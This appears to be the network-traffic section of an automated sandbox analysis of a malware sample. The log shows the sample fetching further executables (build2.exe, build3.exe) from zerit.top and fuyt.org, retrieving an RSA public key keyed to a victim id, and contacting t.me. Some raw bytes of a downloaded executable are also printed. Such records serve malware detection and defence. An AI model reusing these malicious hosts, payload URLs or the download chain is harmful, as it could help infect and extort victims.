Mar 29, 2022 06:51:56.154525042 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:56.154530048 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:56.154555082 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:56.154581070 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:56.154603004 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:56.154630899 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:56.154648066 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:56.154673100 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:56.154719114 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:52:25.789918900 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:52:25.790513039 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:52:25.820102930 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:52:25.820137024 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:52:25.820200920 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:52:25.820234060 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:52:25.821324110 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:52:25.821377039 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:52:25.821408987 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:52:25.821445942 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:52:25.850203037 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:52:25.850255966 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:52:25.850300074 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:52:25.850337982 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:52:25.850352049 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:52:25.850410938 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:52:25.851669073 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:52:25.851738930 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:52:25.852196932 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:52:25.852260113 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:52:25.853358984 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:52:25.853436947 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:52:25.854357958 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:52:25.854582071 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:52:25.854722977 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:52:25.881073952 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:52:25.881177902 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:52:25.881196976 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:52:25.881213903 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:52:25.881285906 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:52:25.881582022 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:52:25.881865025 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:52:25.881982088 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:52:25.882579088 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:52:25.882836103 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:52:25.882977009 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:52:25.886027098 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:52:26.215430975 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:52:26.215545893 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:52:44.674724102 CEST	49793	80	192.168.2.7	5.252.23.88

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Mar 29, 2022 06:51:12.370177031 CEST	59475	53	192.168.2.7	8.8.8.8
Mar 29, 2022 06:51:12.386985064 CEST	53	59475	8.8.8.8	192.168.2.7
Mar 29, 2022 06:51:25.624340057 CEST	64980	53	192.168.2.7	8.8.8.8
Mar 29, 2022 06:51:25.642826080 CEST	53	64980	8.8.8.8	192.168.2.7
Mar 29, 2022 06:51:26.490104914 CEST	58846	53	192.168.2.7	8.8.8.8
Mar 29, 2022 06:51:26.511814117 CEST	52971	53	192.168.2.7	8.8.8.8
Mar 29, 2022 06:51:26.623950958 CEST	53	58846	8.8.8.8	192.168.2.7
Mar 29, 2022 06:51:26.802606106 CEST	53	52971	8.8.8.8	192.168.2.7
Mar 29, 2022 06:51:35.816215038 CEST	59856	53	192.168.2.7	8.8.8.8
Mar 29, 2022 06:51:35.834928989 CEST	53	59856	8.8.8.8	192.168.2.7
Mar 29, 2022 06:51:37.932302952 CEST	51824	53	192.168.2.7	8.8.8.8
Mar 29, 2022 06:51:37.950671911 CEST	53	51824	8.8.8.8	192.168.2.7
Mar 29, 2022 06:51:47.838085890 CEST	65214	53	192.168.2.7	8.8.8.8
Mar 29, 2022 06:51:47.859155893 CEST	53	65214	8.8.8.8	192.168.2.7
Mar 29, 2022 06:51:48.427242994 CEST	55245	53	192.168.2.7	8.8.8.8
Mar 29, 2022 06:51:48.443412066 CEST	53	55245	8.8.8.8	192.168.2.7

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Mar 29, 2022 06:51:12.370177031 CEST	192.168.2.7	8.8.8.8	0x37b3	Standard query (0)	api.2ip.ua	A (IP address)	IN (0x0001)
Mar 29, 2022 06:51:25.624340057 CEST	192.168.2.7	8.8.8.8	0xaaca	Standard query (0)	api.2ip.ua	A (IP address)	IN (0x0001)
Mar 29, 2022 06:51:26.490104914 CEST	192.168.2.7	8.8.8.8	0x731c	Standard query (0)	zerit.top	A (IP address)	IN (0x0001)
Mar 29, 2022 06:51:26.511814117 CEST	192.168.2.7	8.8.8.8	0xc92a	Standard query (0)	fuyt.org	A (IP address)	IN (0x0001)
Mar 29, 2022 06:51:35.816215038 CEST	192.168.2.7	8.8.8.8	0x15a7	Standard query (0)	api.2ip.ua	A (IP address)	IN (0x0001)
Mar 29, 2022 06:51:37.932302952 CEST	192.168.2.7	8.8.8.8	0xc7b9	Standard query (0)	api.2ip.ua	A (IP address)	IN (0x0001)
Mar 29, 2022 06:51:47.838085890 CEST	192.168.2.7	8.8.8.8	0x366c	Standard query (0)	api.2ip.ua	A (IP address)	IN (0x0001)
Mar 29, 2022 06:51:48.427242994 CEST	192.168.2.7	8.8.8.8	0x9776	Standard query (0)	t.me	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class
Mar 29, 2022 06:51:12.386985064 CEST	8.8.8.8	192.168.2.7	0x37b3	No error (0)	api.2ip.ua	162.0.218.244	A (IP address)	IN (0x0001)
Mar 29, 2022 06:51:25.642826080 CEST	8.8.8.8	192.168.2.7	0xaaca	No error (0)	api.2ip.ua	162.0.218.244	A (IP address)	IN (0x0001)
Mar 29, 2022 06:51:26.623950958 CEST	8.8.8.8	192.168.2.7	0x731c	No error (0)	zerit.top	183.78.205.92	A (IP address)	IN (0x0001)
Mar 29, 2022 06:51:26.623950958 CEST	8.8.8.8	192.168.2.7	0x731c	No error (0)	zerit.top	196.200.111.5	A (IP address)	IN (0x0001)
Mar 29, 2022 06:51:26.623950958 CEST	8.8.8.8	192.168.2.7	0x731c	No error (0)	zerit.top	138.36.3.134	A (IP address)	IN (0x0001)
Mar 29, 2022 06:51:26.623950958 CEST	8.8.8.8	192.168.2.7	0x731c	No error (0)	zerit.top	41.41.255.235	A (IP address)	IN (0x0001)
Mar 29, 2022 06:51:26.623950958 CEST	8.8.8.8	192.168.2.7	0x731c	No error (0)	zerit.top	58.124.228.242	A (IP address)	IN (0x0001)
Mar 29, 2022 06:51:26.623950958 CEST	8.8.8.8	192.168.2.7	0x731c	No error (0)	zerit.top	115.91.217.231	A (IP address)	IN (0x0001)
Mar 29, 2022 06:51:26.623950958 CEST	8.8.8.8	192.168.2.7	0x731c	No error (0)	zerit.top	211.171.233.126	A (IP address)	IN (0x0001)
Mar 29, 2022 06:51:26.623950958 CEST	8.8.8.8	192.168.2.7	0x731c	No error (0)	zerit.top	180.69.193.102	A (IP address)	IN (0x0001)
Mar 29, 2022 06:51:26.623950958 CEST	8.8.8.8	192.168.2.7	0x731c	No error (0)	zerit.top	181.31.125.253	A (IP address)	IN (0x0001)
Mar 29, 2022 06:51:26.623950958 CEST	8.8.8.8	192.168.2.7	0x731c	No error (0)	zerit.top	211.119.84.111	A (IP address)	IN (0x0001)
Mar 29, 2022 06:51:26.802606106 CEST	8.8.8.8	192.168.2.7	0xc92a	No error (0)	fuyt.org	183.78.205.92	A (IP address)	IN (0x0001)
Mar 29, 2022 06:51:26.802606106 CEST	8.8.8.8	192.168.2.7	0xc92a	No error (0)	fuyt.org	211.59.14.90	A (IP address)	IN (0x0001)
Mar 29, 2022 06:51:26.802606106 CEST	8.8.8.8	192.168.2.7	0xc92a	No error (0)	fuyt.org	37.34.248.24	A (IP address)	IN (0x0001)
Mar 29, 2022 06:51:26.802606106 CEST	8.8.8.8	192.168.2.7	0xc92a	No error (0)	fuyt.org	222.232.238.243	A (IP address)	IN (0x0001)
Mar 29, 2022 06:51:26.802606106 CEST	8.8.8.8	192.168.2.7	0xc92a	No error (0)	fuyt.org	110.14.121.123	A (IP address)	IN (0x0001)
Mar 29, 2022 06:51:26.802606106 CEST	8.8.8.8	192.168.2.7	0xc92a	No error (0)	fuyt.org	211.40.39.251	A (IP address)	IN (0x0001)
Mar 29, 2022 06:51:26.802606106 CEST	8.8.8.8	192.168.2.7	0xc92a	No error (0)	fuyt.org	222.236.49.124	A (IP address)	IN (0x0001)
Mar 29, 2022 06:51:26.802606106 CEST	8.8.8.8	192.168.2.7	0xc92a	No error (0)	fuyt.org	180.69.193.102	A (IP address)	IN (0x0001)
Mar 29, 2022 06:51:26.802606106 CEST	8.8.8.8	192.168.2.7	0xc92a	No error (0)	fuyt.org	187.190.48.60	A (IP address)	IN (0x0001)
Mar 29, 2022 06:51:26.802606106 CEST	8.8.8.8	192.168.2.7	0xc92a	No error (0)	fuyt.org	109.98.58.98	A (IP address)	IN (0x0001)
Mar 29, 2022 06:51:35.834928989 CEST	8.8.8.8	192.168.2.7	0x15a7	No error (0)	api.2ip.ua	162.0.218.244	A (IP address)	IN (0x0001)
Mar 29, 2022 06:51:37.950671911 CEST	8.8.8.8	192.168.2.7	0xc7b9	No error (0)	api.2ip.ua	162.0.218.244	A (IP address)	IN (0x0001)
Mar 29, 2022 06:51:47.859155893 CEST	8.8.8.8	192.168.2.7	0x366c	No error (0)	api.2ip.ua	162.0.218.244	A (IP address)	IN (0x0001)
Mar 29, 2022 06:51:48.443412066 CEST	8.8.8.8	192.168.2.7	0x9776	No error (0)	t.me	149.154.167.99	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

api.2ip.ua

t.me

zerit.top

fuyt.org

5.252.23.88

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.7	49781	162.0.218.244	443	C:\Users\user\Desktop\Q5W0I0pzFI.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.2.7	49782	162.0.218.244	443	C:\Users\user\Desktop\Q5W0I0pzFI.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
2	192.168.2.7	49789	162.0.218.244	443	C:\Users\user\Desktop\Q5W0I0pzFI.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
3	192.168.2.7	49790	162.0.218.244	443	C:\Users\user\Desktop\Q5W0I0pzFI.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
4	192.168.2.7	49791	162.0.218.244	443	C:\Users\user\Desktop\Q5W0I0pzFI.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
5	192.168.2.7	49792	149.154.167.99	443	C:\Users\user\AppData\Local\4c9fd9b4-d81f-42fb-ad9c-d68d1957f0bd\build2.exe

Timestamp	kBytes transferred	Direction	Data

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
6	192.168.2.7	49783	183.78.205.92	80	C:\Users\user\Desktop\Q5W0I0pzFI.exe

Timestamp	kBytes transferred	Direction	Data
Mar 29, 2022 06:51:27.013823032 CEST	1064	OUT	GET /dl/build2.exe HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: zerit.top
Mar 29, 2022 06:51:27.920449972 CEST	1066	IN	HTTP/1.1 200 OK Date: Tue, 29 Mar 2022 04:51:27 GMT Server: Apache/2.4.6 (CentOS) PHP/5.6.40 Last-Modified: Mon, 28 Mar 2022 15:33:29 GMT ETag: "9a400-5db4908bb325d" Accept-Ranges: bytes Content-Length: 631808 Connection: close Content-Type: application/octet-stream Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 4c 37 a7 ad 08 56 c9 fe 08 56 c9 fe 08 56 c9 fe 16 04 5c fe 19 56 c9 fe 16 04 4a fe 7a 56 c9 fe 2f 90 b2 fe 0d 56 c9 fe 08 56 c8 fe bc 56 c9 fe 16 04 4d fe 32 56 c9 fe 16 04 5d fe 09 56 c9 fe 16 04 58 fe 09 56 c9 fe 52 69 63 68 08 56 c9 fe 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 6d 3c a1 5f 00 00 00 00 00 00 00 00 e0 00 03 01 0b 01 09 00 00 82 02 00 00 ee 09 00 00 00 00 00 40 df 00 00 00 10 00 00 00 a0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 60 0c 00 00 04 00 00 86 47 0a 00 02 00 00 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 30 81 02 00 3c 00 00 00 00 c0 0b 00 d0 93 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 12 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b8 8a 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 10 00 00 98 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 ae 80 02 00 00 10 00 00 00 82 02 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 40 19 09 00 00 a0 02 00 00 8a 06 00 00 86 02 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 d0 93 00 00 00 c0 0b 00 00 94 00 00 00 10 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 84 02 00 14 84 02 00 22 84 02 00 34 84 02 00 46 84 02 00 62 84 02 00 7c 84 02 00 92 84 02 00 a8 84 02 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$L7VVV\VJzV/VVVM2V]VXVRichVPELm<_@@`G0<@.text `.data@@.rsrc@@"4Fb\|
Mar 29, 2022 06:51:27.920504093 CEST	1067	IN	Data Raw: c6 84 02 00 de 84 02 00 f0 84 02 00 00 85 02 00 0c 85 02 00 1c 85 02 00 2a 85 02 00 3a 85 02 00 4a 85 02 00 5a 85 02 00 78 85 02 00 90 85 02 00 a4 85 02 00 b4 85 02 00 d2 85 02 00 de 85 02 00 fa 85 02 00 0a 86 02 00 20 86 02 00 30 86 02 00 3c 86 Data Ascii: :JZx 0<Pdv>\r ,H^\|2Lbn~
Mar 29, 2022 06:51:28.243746042 CEST	1069	IN	Data Raw: 72 00 61 00 6d 00 20 00 46 00 69 00 6c 00 65 00 73 00 20 00 28 00 78 00 38 00 36 00 29 00 5c 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 56 00 69 00 73 00 75 00 61 00 6c 00 20 00 53 00 74 00 75 00 64 00 69 00 6f 00 20 00 39 00 Data Ascii: ram Files (x86)\Microsoft Visual Studio 9.0\VC\include\xutility"out of range"("_Myptr + _Off <= ((_Myvec *)(this->_Get
Mar 29, 2022 06:51:28.243802071 CEST	1070	IN	Data Raw: 20 00 73 00 74 00 64 00 3a 00 3a 00 61 00 6c 00 6c 00 6f 00 63 00 61 00 74 00 6f 00 72 00 3c 00 63 00 68 00 61 00 72 00 3e 00 20 00 3e 00 2c 00 63 00 6c 00 61 00 73 00 73 00 20 00 73 00 74 00 64 00 3a 00 3a 00 61 00 6c 00 6c 00 6f 00 63 00 61 00 Data Ascii: std::allocator<char> >,class std::allocator<class std::basic_string<char,struct std::char_traits<char>,class std::allocat
Mar 29, 2022 06:51:28.243844032 CEST	1071	IN	Data Raw: 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 56 00 69 00 73 00 75 00 61 00 6c 00 20 00 53 00 74 00 75 00 64 00 69 00 6f 00 20 00 39 00 2e 00 30 00 5c 00 56 00 43 00 5c 00 69 00 6e 00 63 00 6c 00 75 00 64 00 65 00 5c 00 78 00 73 00 74 00 72 00 Data Ascii: crosoft Visual Studio 9.0\VC\include\xstring@@P@@vector<T> too longC:\Program Files (x86)\Microsoft Visual Studio 9.0\VC\inclu
Mar 29, 2022 06:51:28.243882895 CEST	1073	IN	Data Raw: 00 00 00 00 5f 00 43 00 72 00 74 00 44 00 62 00 67 00 52 00 65 00 70 00 6f 00 72 00 74 00 3a 00 20 00 53 00 74 00 72 00 69 00 6e 00 67 00 20 00 74 00 6f 00 6f 00 20 00 6c 00 6f 00 6e 00 67 00 20 00 6f 00 72 00 20 00 49 00 4f 00 20 00 45 00 72 00 Data Ascii: _CrtDbgReport: String too long or IO Errorwcscpy_s(szOutMessage, 4096, L"_CrtDbgReport: String too long or IO Error")
Mar 29, 2022 06:51:28.566461086 CEST	1075	IN	Data Raw: 28 00 5f 00 74 00 65 00 78 00 74 00 6d 00 6f 00 64 00 65 00 5f 00 73 00 61 00 66 00 65 00 28 00 66 00 6e 00 29 00 20 00 3d 00 3d 00 20 00 5f 00 5f 00 49 00 4f 00 49 00 4e 00 46 00 4f 00 5f 00 54 00 4d 00 5f 00 41 00 4e 00 53 00 49 00 29 00 20 00 Data Ascii: (_textmode_safe(fn) == __IOINFO_TM_ANSI) && !_tm_unicode_safe(fn))))(stream != NULL)f:\dd\vctools\crt_bld\self_x86\crt\src\_file.cf:\dd\vctools\crt_bld
Mar 29, 2022 06:51:28.566521883 CEST	1077	IN	Data Raw: 6d 6f 72 79 20 62 6c 6f 63 6b 20 74 79 70 65 2e 0a 0a 4d 65 6d 6f 72 79 20 61 6c 6c 6f 63 61 74 65 64 20 61 74 20 25 68 73 28 25 64 29 2e 0a 00 49 6e 76 61 6c 69 64 20 61 6c 6c 6f 63 61 74 69 6f 6e 20 73 69 7a 65 3a 20 25 49 75 20 62 79 74 65 73 Data Ascii: mory block type.Memory allocated at %hs(%d).Invalid allocation size: %Iu bytes.Memory allocated at %hs(%d).Client hook re-allocation failure.Client hook re-allocation failure at file %hs line %d.pUserData != NULL
Mar 29, 2022 06:51:28.566562891 CEST	1078	IN	Data Raw: 20 62 79 74 65 73 20 6c 6f 6e 67 2e 0a 0a 4d 65 6d 6f 72 79 20 61 6c 6c 6f 63 61 74 65 64 20 61 74 20 25 68 73 28 25 64 29 2e 0a 00 00 00 48 45 41 50 20 43 4f 52 52 55 50 54 49 4f 4e 20 44 45 54 45 43 54 45 44 3a 20 6f 6e 20 74 6f 70 20 6f 66 20 Data Ascii: bytes long.Memory allocated at %hs(%d).HEAP CORRUPTION DETECTED: on top of Free block at 0x%p.CRT detected that the application wrote to a heap buffer that was freed.HEAP CORRUPTION DETECTED: on top of Free block at 0x%p.CRT d
Mar 29, 2022 06:51:28.566601038 CEST	1079	IN	Data Raw: 63 74 73 20 2d 3e 0a 00 20 44 61 74 61 3a 20 3c 25 73 3e 20 25 73 0a 00 5f 00 70 00 72 00 69 00 6e 00 74 00 4d 00 65 00 6d 00 42 00 6c 00 6f 00 63 00 6b 00 44 00 61 00 74 00 61 00 00 00 00 00 25 2e 32 58 20 00 00 00 44 65 74 65 63 74 65 64 20 6d Data Ascii: cts -> Data: <%s> %s_printMemBlockData%.2X Detected memory leaks!(L"Buffer is too small" && 0)Buffer is too small(((_Src))) != NULLstrc
Mar 29, 2022 06:51:28.566641092 CEST	1081	IN	Data Raw: 7a 00 4f 00 75 00 74 00 4d 00 65 00 73 00 73 00 61 00 67 00 65 00 2c 00 20 00 28 00 28 00 73 00 69 00 7a 00 65 00 5f 00 74 00 29 00 2d 00 31 00 29 00 29 00 00 00 00 00 00 00 73 00 74 00 72 00 63 00 70 00 79 00 5f 00 73 00 28 00 73 00 7a 00 4f 00 Data Ascii: zOutMessage, ((size_t)-1))strcpy_s(szOutMessage, 4096, szLineMessage)strcpy_s(szOutMessage, 4096, "_CrtDbgReport: Stri

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
7	192.168.2.7	49784	183.78.205.92	80	C:\Users\user\Desktop\Q5W0I0pzFI.exe

Timestamp	kBytes transferred	Direction	Data
Mar 29, 2022 06:51:27.118391991 CEST	1064	OUT	GET /test1/get.php?pid=3C8DAB0A318E3BBE55D6418C454BF200&first=true HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: fuyt.org
Mar 29, 2022 06:51:28.365341902 CEST	1074	IN	HTTP/1.1 200 OK Date: Tue, 29 Mar 2022 04:50:36 GMT Server: Apache/2.4.37 (Win64) PHP/5.6.40 X-Powered-By: PHP/5.6.40 Content-Length: 562 Connection: close Content-Type: text/html; charset=UTF-8 Data Raw: 7b 22 70 75 62 6c 69 63 5f 6b 65 79 22 3a 22 2d 2d 2d 2d 2d 42 45 47 49 4e 26 23 31 36 30 3b 50 55 42 4c 49 43 26 23 31 36 30 3b 4b 45 59 2d 2d 2d 2d 2d 5c 5c 6e 4d 49 49 42 49 6a 41 4e 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 45 46 41 41 4f 43 41 51 38 41 4d 49 49 42 43 67 4b 43 41 51 45 41 31 41 4f 65 55 67 4e 37 63 58 2b 37 54 6f 4d 6a 59 47 76 37 5c 5c 6e 51 6d 59 45 72 44 43 6a 4d 6d 55 55 49 5c 2f 69 4c 4c 50 76 36 5a 48 5a 49 6f 45 53 33 61 42 6e 66 56 39 79 51 49 65 4e 34 70 53 66 41 44 6e 4c 5a 6d 69 66 33 66 7a 77 78 79 58 77 59 30 35 50 70 5c 5c 6e 67 78 42 39 70 34 73 54 34 6c 66 59 70 2b 72 43 78 72 54 5c 2f 66 38 37 37 4b 59 45 63 52 41 39 76 30 6b 59 73 63 37 44 6a 38 70 62 2b 58 39 62 63 4e 6c 30 5c 2f 42 71 55 6f 47 35 5c 2f 4a 6c 72 71 44 5c 5c 6e 53 74 78 44 30 58 4d 5c 2f 72 2b 37 78 55 44 71 49 71 42 48 56 70 31 74 55 4a 6a 54 31 44 4e 71 48 4d 44 39 77 62 73 57 55 31 67 66 71 4d 54 2b 6c 4a 59 63 46 74 78 70 5c 2f 39 76 37 7a 2b 44 58 39 5c 5c 6e 30 42 72 7a 6e 36 77 59 42 34 4c 64 6b 74 5c 2f 67 6b 51 73 72 4b 5c 2f 52 56 4c 6a 34 4f 72 47 62 69 41 5a 76 70 79 54 55 4d 58 4f 55 58 43 67 32 78 42 4a 6e 67 55 64 6e 73 59 6e 30 57 37 4a 6d 39 5c 5c 6e 76 50 61 37 6e 31 6d 7a 6b 74 54 6f 39 4d 4e 67 64 70 4b 2b 6b 58 50 63 32 65 54 34 50 65 36 53 7a 2b 55 55 79 6b 67 49 35 46 66 34 7a 35 31 4a 49 35 45 6a 38 4e 69 65 30 5a 57 66 68 50 30 41 5c 5c 6e 71 77 49 44 41 51 41 42 5c 5c 6e 2d 2d 2d 2d 2d 45 4e 44 26 23 31 36 30 3b 50 55 42 4c 49 43 26 23 31 36 30 3b 4b 45 59 2d 2d 2d 2d 2d 5c 5c 6e 22 2c 22 69 64 22 3a 22 78 62 49 33 6b 6f 72 75 6d 6d 55 42 73 38 46 6b 4f 66 6e 6c 6b 6d 79 50 42 70 47 58 56 56 4c 4b 52 42 71 75 4a 32 4e 68 22 7d Data Ascii: {"public_key":"-----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA1AOeUgN7cX+7ToMjYGv7\\nQmYErDCjMmUUI\/iLLPv6ZHZIoES3aBnfV9yQIeN4pSfADnLZmif3fzwxyXwY05Pp\\ngxB9p4sT4lfYp+rCxrT\/f877KYEcRA9v0kYsc7Dj8pb+X9bcNl0\/BqUoG5\/JlrqD\\nStxD0XM\/r+7xUDqIqBHVp1tUJjT1DNqHMD9wbsWU1gfqMT+lJYcFtxp\/9v7z+DX9\\n0Brzn6wYB4Ldkt\/gkQsrK\/RVLj4OrGbiAZvpyTUMXOUXCg2xBJngUdnsYn0W7Jm9\\nvPa7n1mzktTo9MNgdpK+kXPc2eT4Pe6Sz+UUykgI5Ff4z51JI5Ej8Nie0ZWfhP0A\\nqwIDAQAB\\n-----END PUBLIC KEY-----\\n","id":"xbI3korummUBs8FkOfnlkmyPBpGXVVLKRBquJ2Nh"}

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
8	192.168.2.7	49788	183.78.205.92	80	C:\Users\user\Desktop\Q5W0I0pzFI.exe

Timestamp	kBytes transferred	Direction	Data
Mar 29, 2022 06:51:35.056058884 CEST	1794	OUT	GET /files/1/build3.exe HTTP/1.1 User-Agent: Microsoft Internet Explorer Host: fuyt.org
